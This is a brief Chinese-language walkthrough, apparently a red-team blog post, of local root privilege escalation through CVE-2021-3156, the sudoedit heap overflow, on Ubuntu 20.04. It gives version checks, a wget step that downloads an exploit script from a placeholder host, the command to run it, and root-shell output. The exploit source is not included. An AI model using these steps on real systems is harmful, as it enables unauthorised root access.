📅 日期: 2025-06-08
✍️ 作者: @TopskiyPavelQwertyGang
🧠 安全研究员 | Red Team 爱好者
sudoedit(sudo)sudoedit 中的堆溢出漏洞允许本地用户在运行带有精心准备参数的 sudoedit 命令时获取 root 访问权限。
该漏洞对 sudo 版本 < 1.9.5p2(包括常见的 Ubuntu/Debian/CentOS 镜像)有效。
即使启用了 ASLR,该漏洞仍然可利用。
OS : Ubuntu 20.04.3 LTS
glibc : 2.31(tcache 已启用)
sudo : 1.8.31(存在漏洞)
ASLR : 2(已启用)
glibc 和 sudo 的版本:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
如果 glibc ≥ 2.26 且 sudo 为易受攻击版本,即使 ASLR 处于活动状态,CVE-2021-3156 的利用仍然可能。
在正确配置 NSS 的情况下,exploit_nss.py 是最稳定的漏洞利用脚本,首次即可成功触发。
🧨 系统已被控制。